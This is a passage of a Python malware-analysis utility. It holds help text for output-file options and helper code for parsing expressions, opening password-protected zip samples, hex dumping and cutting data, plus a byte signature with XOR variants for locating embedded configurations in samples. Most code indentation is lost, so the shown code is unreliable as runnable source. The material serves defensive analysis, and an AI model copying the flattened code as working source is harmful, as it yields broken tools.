Option --logfile directs the tool to create a logfile, and option --logcomment can be used to add a comment to the log file. The log file will contain metadata and a list of processed files; it does not contain processing results.
It is best to use this option when option --ignoreprocessingerrors is used, to have a record of file processing errors.
The lines are written to standard output, except when option -o is used. When option -o is used, the lines are written to the filename specified by option -o.
Filenames used with option -o starting with # have special meaning.
#c#example.txt will write output both to the console (stdout) and file example.txt.
#g# will write output to a file with a filename generated by the tool like this: toolname-date-time.txt.
#g#KEYWORD will write output to a file with a filename generated by the tool like this: toolname-KEYWORD-date-time.txt.
Use #p#filename to display execution progress.
To process several files while creating separate output files for each input file, use -o #s#%f%.result *.
This will create output files with the name of the inputfile and extension .result.
There are several variables available when creating separate output files:
%f% is the full filename (with directory if present)
%b% is the base name: the filename without directory
%d% is the directory
%r% is the root: the filename without extension
%ru% is the root made unique by appending a counter (if necessary)
%e% is the extension
#h# is like the head command: only the first 10 lines will be output.
#t# is like the tail command: only the last 10 lines will be output.
Most options can be combined, like #ps# for example.
#l# is used for literal filenames: if the output filename has to start with # (#example.txt for example), use filename #l##example.txt for example.
'''
for line in manual.split('\n'):
print(textwrap.fill(line, 79))
DEFAULT_SEPARATOR = ','
QUOTE = '"'
START_CONFIG = b'\x00\x01\x00\x01\x00\x02'
START_CONFIG_I = b'ihihik'
START_CONFIG_DOT = b'././.,'
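# Note: START_CONFIG_I and START_CONFIG_DOT are START_CONFIG XOR-ed with the two common
# config XOR keys 0x69 ('i') and 0x2e ('.') respectively.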
ERROR_NO_CONFIG = 'Error: config not found'
ERROR_SANITY_CHECK = 'Error: config does not pass sanity check'
def PrintError(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
#Convert 2 Bytes If Python 3
def C2BIP3(string):
if sys.version_info[0] > 2:
return bytes([ord(x) for x in string])
else:
return string
#Convert 2 String If Python 3
def C2SIP3(bytes):
if sys.version_info[0] > 2:
return ''.join([chr(byte) for byte in bytes])
else:
return bytes
#Convert 2 Integer If Python 2
def C2IIP2(data):
if sys.version_info[0] > 2:
return data
else:
return ord(data)
def P23Ord(value):
if type(value) == int:
return value
else:
return ord(value)
# CIC: Call If Callable
def CIC(expression):
if callable(expression):
return expression()
else:
return expression
# IFF: IF Function
def IFF(expression, valueTrue, valueFalse):
if expression:
return CIC(valueTrue)
else:
return CIC(valueFalse)
#-BEGINCODE cBinaryFile------------------------------------------------------------------------------
#import random
#import binascii
#import zipfile
#import gzip
#import sys
#if sys.version_info[0] >= 3:
# from io import BytesIO as DataIO
#else:
# from cStringIO import StringIO as DataIO
def LoremIpsumSentence(minimum, maximum):
words = ['lorem', 'ipsum', 'dolor', 'sit', 'amet', 'consectetur', 'adipiscing', 'elit', 'etiam', 'tortor', 'metus', 'cursus', 'sed', 'sollicitudin', 'ac', 'sagittis', 'eget', 'massa', 'praesent', 'sem', 'fermentum', 'dignissim', 'in', 'vel', 'augue', 'scelerisque', 'auctor', 'libero', 'nam', 'a', 'gravida', 'odio', 'duis', 'vestibulum', 'vulputate', 'quam', 'nec', 'cras', 'nibh', 'feugiat', 'ut', 'vitae', 'ornare', 'justo', 'orci', 'varius', 'natoque', 'penatibus', 'et', 'magnis', 'dis', 'parturient', 'montes', 'nascetur', 'ridiculus', 'mus', 'curabitur', 'nisl', 'egestas', 'urna', 'iaculis', 'lectus', 'maecenas', 'ultrices', 'velit', 'eu', 'porta', 'hac', 'habitasse', 'platea', 'dictumst', 'integer', 'id', 'commodo', 'mauris', 'interdum', 'malesuada', 'fames', 'ante', 'primis', 'faucibus', 'accumsan', 'pharetra', 'aliquam', 'nunc', 'at', 'est', 'non', 'leo', 'nulla', 'sodales', 'porttitor', 'facilisis', 'aenean', 'condimentum', 'rutrum', 'facilisi', 'tincidunt', 'laoreet', 'ultricies', 'neque', 'diam', 'euismod', 'consequat', 'tempor', 'elementum', 'lobortis', 'erat', 'ligula', 'risus', 'donec', 'phasellus', 'quisque', 'vivamus', 'pellentesque', 'tristique', 'venenatis', 'purus', 'mi', 'dictum', 'posuere', 'fringilla', 'quis', 'magna', 'pretium', 'felis', 'pulvinar', 'lacinia', 'proin', 'viverra', 'lacus', 'suscipit', 'aliquet', 'dui', 'molestie', 'dapibus', 'mollis', 'suspendisse', 'sapien', 'blandit', 'morbi', 'tellus', 'enim', 'maximus', 'semper', 'arcu', 'bibendum', 'convallis', 'hendrerit', 'imperdiet', 'finibus', 'fusce', 'congue', 'ullamcorper', 'placerat', 'nullam', 'eros', 'habitant', 'senectus', 'netus', 'turpis', 'luctus', 'volutpat', 'rhoncus', 'mattis', 'nisi', 'ex', 'tempus', 'eleifend', 'vehicula', 'class', 'aptent', 'taciti', 'sociosqu', 'ad', 'litora', 'torquent', 'per', 'conubia', 'nostra', 'inceptos', 'himenaeos']
sample = random.sample(words, random.randint(minimum, maximum))
sample[0] = sample[0].capitalize()
return ' '.join(sample) + '.'
def LoremIpsum(sentences):
return ' '.join([LoremIpsumSentence(15, 30) for i in range(sentences)])
STATE_START = 0
STATE_IDENTIFIER = 1
STATE_STRING = 2
STATE_SPECIAL_CHAR = 3
STATE_ERROR = 4
FUNCTIONNAME_REPEAT = 'repeat'
FUNCTIONNAME_RANDOM = 'random'
FUNCTIONNAME_CHR = 'chr'
FUNCTIONNAME_LOREMIPSUM = 'loremipsum'
def Tokenize(expression):
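    # Illustrative example (tracing the state machine below):
    #   Tokenize("repeat(2,'AB')") -> [[STATE_IDENTIFIER, 'repeat'], [STATE_SPECIAL_CHAR, '('],
    #     [STATE_IDENTIFIER, '2'], [STATE_SPECIAL_CHAR, ','], [STATE_STRING, 'AB'], [STATE_SPECIAL_CHAR, ')']]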
result = []
token = ''
state = STATE_START
while expression != '':
char = expression[0]
expression = expression[1:]
if char == "'":
if state == STATE_START:
state = STATE_STRING
elif state == STATE_IDENTIFIER:
result.append([STATE_IDENTIFIER, token])
state = STATE_STRING
token = ''
elif state == STATE_STRING:
result.append([STATE_STRING, token])
state = STATE_START
token = ''
elif char >= '0' and char <= '9' or char.lower() >= 'a' and char.lower() <= 'z':
if state == STATE_START:
token = char
state = STATE_IDENTIFIER
else:
token += char
elif char == ' ':
if state == STATE_IDENTIFIER:
result.append([STATE_IDENTIFIER, token])
token = ''
state = STATE_START
elif state == STATE_STRING:
token += char
else:
if state == STATE_IDENTIFIER:
result.append([STATE_IDENTIFIER, token])
token = ''
state = STATE_START
result.append([STATE_SPECIAL_CHAR, char])
elif state == STATE_STRING:
token += char
else:
result.append([STATE_SPECIAL_CHAR, char])
token = ''
if state == STATE_IDENTIFIER:
result.append([state, token])
elif state == STATE_STRING:
result = [[STATE_ERROR, 'Error: string not closed', token]]
return result
def ParseFunction(tokens):
if len(tokens) == 0:
print('Parsing error')
return None, tokens
if tokens[0][0] == STATE_STRING or tokens[0][0] == STATE_IDENTIFIER and tokens[0][1].startswith('0x'):
return [[FUNCTIONNAME_REPEAT, [[STATE_IDENTIFIER, '1'], tokens[0]]], tokens[1:]]
if tokens[0][0] != STATE_IDENTIFIER:
print('Parsing error')
return None, tokens
function = tokens[0][1]
tokens = tokens[1:]
if len(tokens) == 0:
print('Parsing error')
return None, tokens
if tokens[0][0] != STATE_SPECIAL_CHAR or tokens[0][1] != '(':
print('Parsing error')
return None, tokens
tokens = tokens[1:]
if len(tokens) == 0:
print('Parsing error')
return None, tokens
arguments = []
while True:
if tokens[0][0] != STATE_IDENTIFIER and tokens[0][0] != STATE_STRING:
print('Parsing error')
return None, tokens
arguments.append(tokens[0])
tokens = tokens[1:]
if len(tokens) == 0:
print('Parsing error')
return None, tokens
if tokens[0][0] != STATE_SPECIAL_CHAR or (tokens[0][1] != ',' and tokens[0][1] != ')'):
print('Parsing error')
return None, tokens
if tokens[0][0] == STATE_SPECIAL_CHAR and tokens[0][1] == ')':
tokens = tokens[1:]
break
tokens = tokens[1:]
if len(tokens) == 0:
print('Parsing error')
return None, tokens
return [[function, arguments], tokens]
def Parse(expression):
tokens = Tokenize(expression)
if len(tokens) == 0:
print('Parsing error')
return None
if tokens[0][0] == STATE_ERROR:
print(tokens[0][1])
print(tokens[0][2])
print(expression)
return None
functioncalls = []
while True:
functioncall, tokens = ParseFunction(tokens)
if functioncall == None:
return None
functioncalls.append(functioncall)
if len(tokens) == 0:
return functioncalls
if tokens[0][0] != STATE_SPECIAL_CHAR or tokens[0][1] != '+':
print('Parsing error')
return None
tokens = tokens[1:]
def InterpretInteger(token):
if token[0] != STATE_IDENTIFIER:
return None
try:
return int(token[1])
except:
return None
def Hex2Bytes(hexadecimal):
if len(hexadecimal) % 2 == 1:
hexadecimal = '0' + hexadecimal
try:
return binascii.a2b_hex(hexadecimal)
except:
return None
def InterpretHexInteger(token):
if token[0] != STATE_IDENTIFIER:
return None
if not token[1].startswith('0x'):
return None
bytes = Hex2Bytes(token[1][2:])
if bytes == None:
return None
integer = 0
for byte in bytes:
integer = integer * 0x100 + C2IIP2(byte)
return integer
def InterpretNumber(token):
number = InterpretInteger(token)
if number == None:
return InterpretHexInteger(token)
else:
return number
def InterpretBytes(token):
if token[0] == STATE_STRING:
return token[1]
if token[0] != STATE_IDENTIFIER:
return None
if not token[1].startswith('0x'):
return None
return Hex2Bytes(token[1][2:])
def CheckFunction(functionname, arguments, countarguments, maxcountarguments=None):
if maxcountarguments == None:
if countarguments == 0 and len(arguments) != 0:
print('Error: function %s takes no arguments, %d are given' % (functionname, len(arguments)))
return True
if countarguments == 1 and len(arguments) != 1:
print('Error: function %s takes 1 argument, %d are given' % (functionname, len(arguments)))
return True
if countarguments != len(arguments):
print('Error: function %s takes %d arguments, %d are given' % (functionname, countarguments, len(arguments)))
return True
else:
if len(arguments) < countarguments or len(arguments) > maxcountarguments:
print('Error: function %s takes between %d and %d arguments, %d are given' % (functionname, countarguments, maxcountarguments, len(arguments)))
return True
return False
def CheckNumber(argument, minimum=None, maximum=None):
number = InterpretNumber(argument)
if number == None:
print('Error: argument should be a number: %s' % argument[1])
return None
if minimum != None and number < minimum:
print('Error: argument should be minimum %d: %d' % (minimum, number))
return None
if maximum != None and number > maximum:
print('Error: argument should be maximum %d: %d' % (maximum, number))
return None
return number
def Interpret(expression):
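    # Illustrative examples of #e# expressions handled by this interpreter:
    #   Interpret("repeat(3,'AB')")  -> 'ABABAB'
    #   Interpret("chr(0x41,0x45)")  -> 'ABCDE'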
functioncalls = Parse(expression)
if functioncalls == None:
return None
decoded = ''
for functioncall in functioncalls:
functionname, arguments = functioncall
if functionname == FUNCTIONNAME_REPEAT:
if CheckFunction(functionname, arguments, 2):
return None
number = CheckNumber(arguments[0], minimum=1)
if number == None:
return None
bytes = InterpretBytes(arguments[1])
if bytes == None:
print('Error: argument should be a byte sequence: %s' % arguments[1][1])
return None
decoded += number * bytes
elif functionname == FUNCTIONNAME_RANDOM:
if CheckFunction(functionname, arguments, 1):
return None
number = CheckNumber(arguments[0], minimum=1)
if number == None:
return None
decoded += ''.join([chr(random.randint(0, 255)) for x in range(number)])
elif functionname == FUNCTIONNAME_LOREMIPSUM:
if CheckFunction(functionname, arguments, 1):
return None
number = CheckNumber(arguments[0], minimum=1)
if number == None:
return None
decoded += LoremIpsum(number)
elif functionname == FUNCTIONNAME_CHR:
if CheckFunction(functionname, arguments, 1, 2):
return None
number = CheckNumber(arguments[0], minimum=1, maximum=255)
if number == None:
return None
if len(arguments) == 1:
decoded += chr(number)
else:
number2 = CheckNumber(arguments[1], minimum=1, maximum=255)
if number2 == None:
return None
if number < number2:
decoded += ''.join([chr(n) for n in range(number, number2 + 1)])
else:
decoded += ''.join([chr(n) for n in range(number, number2 - 1, -1)])
else:
print('Error: unknown function: %s' % functionname)
return None
return decoded
FCH_FILENAME = 0
FCH_DATA = 1
FCH_ERROR = 2
def FilenameCheckHash(filename, literalfilename):
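    # Illustrative mappings with literalfilename=False (Python 3 byte values shown):
    #   '#h#4142'  -> (FCH_DATA, b'AB')          hexadecimal content
    #   '#b#QUJD'  -> (FCH_DATA, b'ABC')         BASE64 content
    #   '#ABC'     -> (FCH_DATA, b'ABC')         literal content after '#'
    #   'file.bin' -> (FCH_FILENAME, 'file.bin')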
if literalfilename:
return FCH_FILENAME, filename
elif filename.startswith('#h#'):
result = Hex2Bytes(filename[3:])
if result == None:
return FCH_ERROR, 'hexadecimal'
else:
return FCH_DATA, result
elif filename.startswith('#b#'):
try:
return FCH_DATA, binascii.a2b_base64(filename[3:])
except:
return FCH_ERROR, 'base64'
elif filename.startswith('#e#'):
result = Interpret(filename[3:])
if result == None:
return FCH_ERROR, 'expression'
else:
return FCH_DATA, result
elif filename.startswith('#'):
return FCH_DATA, C2BIP3(filename[1:])
else:
return FCH_FILENAME, filename
def AnalyzeFileError(filename):
PrintError('Error opening file %s' % filename)
PrintError(sys.exc_info()[1])
try:
if not os.path.exists(filename):
PrintError('The file does not exist')
elif os.path.isdir(filename):
PrintError('The file is a directory')
elif not os.path.isfile(filename):
PrintError('The file is not a regular file')
except:
pass
def CreateZipFileObject(arg1, arg2):
if 'AESZipFile' in dir(zipfile):
return zipfile.AESZipFile(arg1, arg2)
else:
return zipfile.ZipFile(arg1, arg2)
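# Typical use of cBinaryFile (illustrative): read the content of a sample, transparently
# extracting it first when it is a .zip or .gz file, e.g.:
#   data = cBinaryFile('sample.vir.zip', 'infected').Data()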
class cBinaryFile:
def __init__(self, filename, zippassword='infected', noextraction=False, literalfilename=False):
self.filename = filename
self.zippassword = zippassword
self.noextraction = noextraction
self.literalfilename = literalfilename
self.oZipfile = None
self.extracted = False
self.fIn = None
fch, data = FilenameCheckHash(self.filename, self.literalfilename)
if fch == FCH_ERROR:
line = 'Error %s parsing filename: %s' % (data, self.filename)
raise Exception(line)
try:
if self.filename == '':
if sys.platform == 'win32':
import msvcrt
msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
self.fIn = sys.stdin
elif fch == FCH_DATA:
self.fIn = DataIO(data)
elif not self.noextraction and self.filename.lower().endswith('.zip'):
self.oZipfile = CreateZipFileObject(self.filename, 'r')
if len(self.oZipfile.infolist()) == 1:
self.fIn = self.oZipfile.open(self.oZipfile.infolist()[0], 'r', self.zippassword)
self.extracted = True
else:
self.oZipfile.close()
self.oZipfile = None
self.fIn = open(self.filename, 'rb')
elif not self.noextraction and self.filename.lower().endswith('.gz'):
self.fIn = gzip.GzipFile(self.filename, 'rb')
self.extracted = True
else:
self.fIn = open(self.filename, 'rb')
except:
AnalyzeFileError(self.filename)
raise
def close(self):
if self.fIn != sys.stdin and self.fIn != None:
self.fIn.close()
if self.oZipfile != None:
self.oZipfile.close()
def read(self, size=None):
try:
fRead = self.fIn.buffer
except:
fRead = self.fIn
if size == None:
return fRead.read()
else:
return fRead.read(size)
def Data(self):
data = self.read()
self.close()
return data
#-ENDCODE cBinaryFile--------------------------------------------------------------------------------
def File2Strings(filename):
try:
if filename == '':
f = sys.stdin
else:
f = open(filename, 'r')
except:
return None
try:
return map(lambda line:line.rstrip('\n'), f.readlines())
except:
return None
finally:
if f != sys.stdin:
f.close()
def File2String(filename):
try:
f = open(filename, 'rb')
except:
return None
try:
return f.read()
except:
return None
finally:
f.close()
def ProcessAt(argument):
if argument.startswith('@'):
strings = File2Strings(argument[1:])
if strings == None:
raise Exception('Error reading %s' % argument)
else:
return strings
else:
return [argument]
def Glob(filename):
filenames = glob.glob(filename)
if len(filenames) == 0:
return [filename]
else:
return filenames
class cExpandFilenameArguments():
def __init__(self, filenames, literalfilenames=False, recursedir=False, checkfilenames=False, expressionprefix=None, flagprefix=None):
self.containsUnixShellStyleWildcards = False
self.warning = False
self.message = ''
self.filenameexpressionsflags = []
self.expressionprefix = expressionprefix
self.flagprefix = flagprefix
self.literalfilenames = literalfilenames
expression = ''
flag = ''
if len(filenames) == 0:
self.filenameexpressionsflags = [['', '', '']]
elif literalfilenames:
self.filenameexpressionsflags = [[filename, '', ''] for filename in filenames]
elif recursedir:
for dirwildcard in filenames:
if expressionprefix != None and dirwildcard.startswith(expressionprefix):
expression = dirwildcard[len(expressionprefix):]
elif flagprefix != None and dirwildcard.startswith(flagprefix):
flag = dirwildcard[len(flagprefix):]
else:
if dirwildcard.startswith('@'):
for filename in ProcessAt(dirwildcard):
self.filenameexpressionsflags.append([filename, expression, flag])
elif os.path.isfile(dirwildcard):
self.filenameexpressionsflags.append([dirwildcard, expression, flag])
else:
if os.path.isdir(dirwildcard):
dirname = dirwildcard
basename = '*'
else:
dirname, basename = os.path.split(dirwildcard)
if dirname == '':
dirname = '.'
for path, dirs, files in os.walk(dirname):
for filename in fnmatch.filter(files, basename):
self.filenameexpressionsflags.append([os.path.join(path, filename), expression, flag])
else:
for filename in list(collections.OrderedDict.fromkeys(sum(map(self.Glob, sum(map(ProcessAt, filenames), [])), []))):
if expressionprefix != None and filename.startswith(expressionprefix):
expression = filename[len(expressionprefix):]
elif flagprefix != None and filename.startswith(flagprefix):
flag = filename[len(flagprefix):]
else:
self.filenameexpressionsflags.append([filename, expression, flag])
self.warning = self.containsUnixShellStyleWildcards and len(self.filenameexpressionsflags) == 0
if self.warning:
self.message = "Your filename argument(s) contain Unix shell-style wildcards, but no files were matched.\nCheck your wildcard patterns or use option literalfilenames if you don't want wildcard pattern matching."
return
if self.filenameexpressionsflags == [] and (expression != '' or flag != ''):
self.filenameexpressionsflags = [['', expression, flag]]
if checkfilenames:
self.CheckIfFilesAreValid()
def Glob(self, filename):
if not ('?' in filename or '*' in filename or ('[' in filename and ']' in filename)):
return [filename]
self.containsUnixShellStyleWildcards = True
return glob.glob(filename)
def CheckIfFilesAreValid(self):
valid = []
doesnotexist = []
isnotafile = []
for filename, expression, flag in self.filenameexpressionsflags:
hashfile = False
try:
hashfile = FilenameCheckHash(filename, self.literalfilenames)[0] == FCH_DATA
except:
pass
if filename == '' or hashfile:
valid.append([filename, expression, flag])
elif not os.path.exists(filename):
doesnotexist.append(filename)
elif not os.path.isfile(filename):
isnotafile.append(filename)
else:
valid.append([filename, expression, flag])
self.filenameexpressionsflags = valid
if len(doesnotexist) > 0:
self.warning = True
self.message += 'The following files do not exist and will be skipped: ' + ' '.join(doesnotexist) + '\n'
if len(isnotafile) > 0:
self.warning = True
self.message += 'The following files are not regular files and will be skipped: ' + ' '.join(isnotafile) + '\n'
def Filenames(self):
if self.expressionprefix == None:
return [filename for filename, expression, flag in self.filenameexpressionsflags]
else:
return self.filenameexpressionsflags
def CheckJSON(stringJSON):
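    # Shape of the JSON accepted here, inferred from the checks below: a dict with
    # version 2, id 'didierstevens.com', type 'content', a 'fields' entry containing
    # 'name' and 'content', and an 'items' list whose entries carry BASE64 'content'.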
try:
object = json.loads(stringJSON)
except:
print('Error parsing JSON')
print(sys.exc_info()[1])
return None
if not isinstance(object, dict):
print('Error JSON is not a dictionary')
return None
if not 'version' in object:
print('Error JSON dictionary has no version')
return None
if object['version'] != 2:
print('Error JSON dictionary has wrong version')
return None
if not 'id' in object:
print('Error JSON dictionary has no id')
return None
if object['id'] != 'didierstevens.com':
print('Error JSON dictionary has wrong id')
return None
if not 'type' in object:
print('Error JSON dictionary has no type')
return None
if object['type'] != 'content':
print('Error JSON dictionary has wrong type')
return None
if not 'fields' in object:
print('Error JSON dictionary has no fields')
return None
if not 'name' in object['fields']:
print('Error JSON dictionary has no name field')
return None
if not 'content' in object['fields']:
print('Error JSON dictionary has no content field')
return None
if not 'items' in object:
print('Error JSON dictionary has no items')
return None
for item in object['items']:
item['content'] = binascii.a2b_base64(item['content'])
return object['items']
CUTTERM_NOTHING = 0
CUTTERM_POSITION = 1
CUTTERM_FIND = 2
CUTTERM_LENGTH = 3
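# The CUTTERM_* constants support cut expressions of the form 'term:term', parsed by
# ParseCutTerm, ParseCutArgument and CutData below. A term can be empty, a position
# (decimal or 0x hexadecimal; a negative right-side position counts from the end of the data),
# or a find term: [hexdigits], ['ascii string'] or [u'unicode string'], optionally followed by
# an instance number and a +/- offset. The right-side term may also be a number followed by 'l'
# to express a length. Illustrative examples: ':0x1F' selects the first 0x20 bytes,
# '[d0cf11e0]:' starts the selection at the first occurrence of bytes D0CF11E0, ':100l' selects
# the first 100 bytes.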
def Replace(string, dReplacements):
if string in dReplacements:
return dReplacements[string]
else:
return string
def ParseInteger(argument):
sign = 1
if argument.startswith('+'):
argument = argument[1:]
elif argument.startswith('-'):
argument = argument[1:]
sign = -1
if argument.startswith('0x'):
return sign * int(argument[2:], 16)
else:
return sign * int(argument)
def ParseCutTerm(argument):
if argument == '':
return CUTTERM_NOTHING, None, ''
oMatch = re.match(r'\-?0x([0-9a-f]+)', argument, re.I)
if oMatch == None:
oMatch = re.match(r'\-?(\d+)', argument)
else:
value = int(oMatch.group(1), 16)
if argument.startswith('-'):
value = -value
return CUTTERM_POSITION, value, argument[len(oMatch.group(0)):]
if oMatch == None:
oMatch = re.match(r'\[([0-9a-f]+)\](\d+)?([+-](?:0x[0-9a-f]+|\d+))?', argument, re.I)
else:
value = int(oMatch.group(1))
if argument.startswith('-'):
value = -value
return CUTTERM_POSITION, value, argument[len(oMatch.group(0)):]
if oMatch == None:
oMatch = re.match(r"\[u?\'(.+?)\'\](\d+)?([+-](?:0x[0-9a-f]+|\d+))?", argument)
else:
if len(oMatch.group(1)) % 2 == 1:
raise Exception("Uneven length hexadecimal string")
else:
return CUTTERM_FIND, (binascii.a2b_hex(oMatch.group(1)), int(Replace(oMatch.group(2), {None: '1'})), ParseInteger(Replace(oMatch.group(3), {None: '0'}))), argument[len(oMatch.group(0)):]
if oMatch == None:
return None, None, argument
else:
if argument.startswith("[u'"):
# convert ascii to unicode 16 byte sequence
searchtext = oMatch.group(1).decode('unicode_escape').encode('utf16')[2:]
else:
searchtext = oMatch.group(1)
return CUTTERM_FIND, (searchtext, int(Replace(oMatch.group(2), {None: '1'})), ParseInteger(Replace(oMatch.group(3), {None: '0'}))), argument[len(oMatch.group(0)):]
def ParseCutArgument(argument):
type, value, remainder = ParseCutTerm(argument.strip())
if type == CUTTERM_NOTHING:
return CUTTERM_NOTHING, None, CUTTERM_NOTHING, None
elif type == None:
if remainder.startswith(':'):
typeLeft = CUTTERM_NOTHING
valueLeft = None
remainder = remainder[1:]
else:
return None, None, None, None
else:
typeLeft = type
valueLeft = value
if typeLeft == CUTTERM_POSITION and valueLeft < 0:
return None, None, None, None
if typeLeft == CUTTERM_FIND and valueLeft[1] == 0:
return None, None, None, None
if remainder.startswith(':'):
remainder = remainder[1:]
else:
return None, None, None, None
type, value, remainder = ParseCutTerm(remainder)
if type == CUTTERM_POSITION and remainder == 'l':
return typeLeft, valueLeft, CUTTERM_LENGTH, value
elif type == None or remainder != '':
return None, None, None, None
elif type == CUTTERM_FIND and value[1] == 0:
return None, None, None, None
else:
return typeLeft, valueLeft, type, value
def Find(data, value, nth, startposition=-1):
position = startposition
while nth > 0:
position = data.find(value, position + 1)
if position == -1:
return -1
nth -= 1
return position
def CutData(stream, cutArgument):
if cutArgument == '':
return [stream, None, None]
typeLeft, valueLeft, typeRight, valueRight = ParseCutArgument(cutArgument)
if typeLeft == None:
return [stream, None, None]
if typeLeft == CUTTERM_NOTHING:
positionBegin = 0
elif typeLeft == CUTTERM_POSITION:
positionBegin = valueLeft
elif typeLeft == CUTTERM_FIND:
positionBegin = Find(stream, valueLeft[0], valueLeft[1])
if positionBegin == -1:
return ['', None, None]
positionBegin += valueLeft[2]
else:
raise Exception("Unknown value typeLeft")
if typeRight == CUTTERM_NOTHING:
positionEnd = len(stream)
elif typeRight == CUTTERM_POSITION and valueRight < 0:
positionEnd = len(stream) + valueRight
elif typeRight == CUTTERM_POSITION:
positionEnd = valueRight + 1
elif typeRight == CUTTERM_LENGTH:
positionEnd = positionBegin + valueRight
elif typeRight == CUTTERM_FIND:
positionEnd = Find(stream, valueRight[0], valueRight[1], positionBegin)
if positionEnd == -1:
return ['', None, None]
else:
positionEnd += len(valueRight[0])
positionEnd += valueRight[2]
else:
raise Exception("Unknown value typeRight")
return [stream[positionBegin:positionEnd], positionBegin, positionEnd]
#-BEGINCODE cDump------------------------------------------------------------------------------------
#import binascii
#import sys
#if sys.version_info[0] >= 3:
# from io import StringIO
#else:
# from cStringIO import StringIO
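# cDump wraps a bytes sequence and renders it as a hex dump (HexDump), a combined hex/ASCII
# dump with optional run-length collapsing of repeated lines (HexAsciiDump(rle=True)), or
# BASE64 (Base64Dump); prefix, offset and dumplinelength control the formatting.
# Illustrative example: cDump(b'ABC', prefix=' ', offset=0x100).HexAsciiDump()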
class cDump():
def __init__(self, data, prefix='', offset=0, dumplinelength=16):
self.data = data
self.prefix = prefix
self.offset = offset
self.dumplinelength = dumplinelength
def HexDump(self):
oDumpStream = self.cDumpStream(self.prefix)
hexDump = ''
for i, b in enumerate(self.data):
if i % self.dumplinelength == 0 and hexDump != '':
oDumpStream.Addline(hexDump)
hexDump = ''
hexDump += IFF(hexDump == '', '', ' ') + '%02X' % self.C2IIP2(b)
oDumpStream.Addline(hexDump)
return oDumpStream.Content()
def CombineHexAscii(self, hexDump, asciiDump):
if hexDump == '':
return ''
countSpaces = 3 * (self.dumplinelength - len(asciiDump))
if len(asciiDump) <= self.dumplinelength / 2:
countSpaces += 1
return hexDump + ' ' + (' ' * countSpaces) + asciiDump
def HexAsciiDump(self, rle=False):
oDumpStream = self.cDumpStream(self.prefix)
position = ''
hexDump = ''
asciiDump = ''
previousLine = None
countRLE = 0
for i, b in enumerate(self.data):
b = self.C2IIP2(b)
if i % self.dumplinelength == 0:
if hexDump != '':
line = self.CombineHexAscii(hexDump, asciiDump)
if not rle or line != previousLine:
if countRLE > 0:
oDumpStream.Addline('* %d 0x%02x' % (countRLE, countRLE * self.dumplinelength))
oDumpStream.Addline(position + line)
countRLE = 0
else:
countRLE += 1
previousLine = line
position = '%08X:' % (i + self.offset)
hexDump = ''
asciiDump = ''
if i % self.dumplinelength == self.dumplinelength / 2:
hexDump += ' '
hexDump += ' %02X' % b
asciiDump += IFF(b >= 32 and b < 128, chr(b), '.')
if countRLE > 0:
oDumpStream.Addline('* %d 0x%02x' % (countRLE, countRLE * self.dumplinelength))
oDumpStream.Addline(self.CombineHexAscii(position + hexDump, asciiDump))
return oDumpStream.Content()
def Base64Dump(self, nowhitespace=False):
encoded = binascii.b2a_base64(self.data)
if nowhitespace:
return encoded
encoded = encoded.strip()
oDumpStream = self.cDumpStream(self.prefix)
length = 64
for i in range(0, len(encoded), length):
            oDumpStream.Addline(encoded[0+i:length+i].decode('latin'))  # decode: Addline concatenates the line with a str prefix (Python 3)
return oDumpStream.Content()
class cDumpStream():
def __init__(self, prefix=''):
self.oStringIO = StringIO()
self.prefix = prefix
def Addline(self, line):
if line != '':
self.oStringIO.write(self.prefix + line + '\n')
def Content(self):
return self.oStringIO.getvalue()
@staticmethod
def C2IIP2(data):
if sys.version_info[0] > 2:
return data
else:
return ord(data)
#-ENDCODE cDump--------------------------------------------------------------------------------------
def IfWIN32SetBinary(io):
if sys.platform == 'win32':
import msvcrt
msvcrt.setmode(io.fileno(), os.O_BINARY)
#Fix for http://bugs.python.org/issue11395
def StdoutWriteChunked(data):
if sys.version_info[0] > 2:
sys.stdout.buffer.write(data)
else:
while data != '':
sys.stdout.write(data[0:10000])
try:
sys.stdout.flush()
except IOError:
return
data = data[10000:]
class cVariables():
def __init__(self, variablesstring='', separator=DEFAULT_SEPARATOR):
self.dVariables = {}
if variablesstring == '':
return
for variable in variablesstring.split(separator):
name, value = VariableNameValue(variable)
self.dVariables[name] = value
def SetVariable(self, name, value):
self.dVariables[name] = value
def Instantiate(self, astring):
for key, value in self.dVariables.items():
astring = astring.replace('%' + key + '%', value)
return astring
class cOutput():
def __init__(self, filenameOption=None):
self.starttime = time.time()
self.filenameOption = filenameOption
self.separateFiles = False
self.progress = False
self.console = False
self.head = False
self.headCounter = 0
self.tail = False
self.tailQueue = []
self.fOut = None
self.rootFilenames = {}
if self.filenameOption:
if self.ParseHash(self.filenameOption):
if not self.separateFiles and self.filename != '':
self.fOut = open(self.filename, 'w')
elif self.filenameOption != '':
self.fOut = open(self.filenameOption, 'w')
self.dReplacements = {}
def Replace(self, line):
for key, value in self.dReplacements.items():
line = line.replace(key, value)
return line
def ParseHash(self, option):
if option.startswith('#'):
position = self.filenameOption.find('#', 1)
if position > 1:
switches = self.filenameOption[1:position]
self.filename = self.filenameOption[position + 1:]
for switch in switches:
if switch == 's':
self.separateFiles = True
elif switch == 'p':
self.progress = True
elif switch == 'c':
self.console = True
elif switch == 'l':
pass
elif switch == 'g':
if self.filename != '':
extra = self.filename + '-'
else:
extra = ''
self.filename = '%s-%s%s.txt' % (os.path.splitext(os.path.basename(sys.argv[0]))[0], extra, self.FormatTime())
elif switch == 'h':
self.head = True
elif switch == 't':
self.tail = True
else:
return False
return True
return False
@staticmethod
def FormatTime(epoch=None):
if epoch == None:
epoch = time.time()
return '%04d%02d%02d-%02d%02d%02d' % time.localtime(epoch)[0:6]
def RootUnique(self, root):
if not root in self.rootFilenames:
self.rootFilenames[root] = None
return root
iter = 1
while True:
newroot = '%s_%04d' % (root, iter)
if not newroot in self.rootFilenames:
self.rootFilenames[newroot] = None
return newroot
iter += 1
def LineSub(self, line, eol):
line = self.Replace(line)
if self.fOut == None or self.console:
try:
print(line, end=eol)
except UnicodeEncodeError:
encoding = sys.stdout.encoding
print(line.encode(encoding, errors='backslashreplace').decode(encoding), end=eol)
# sys.stdout.flush()
if self.fOut != None:
self.fOut.write(line + '\n')
self.fOut.flush()
def Line(self, line, eol='\n'):
if self.head:
if self.headCounter < 10:
self.LineSub(line, eol)
elif self.tail:
self.tailQueue = self.tailQueue[-9:] + [[line, eol]]
self.headCounter += 1
elif self.tail:
self.tailQueue = self.tailQueue[-9:] + [[line, eol]]
else:
self.LineSub(line, eol)
def LineTimestamped(self, line):
self.Line('%s: %s' % (self.FormatTime(), line))
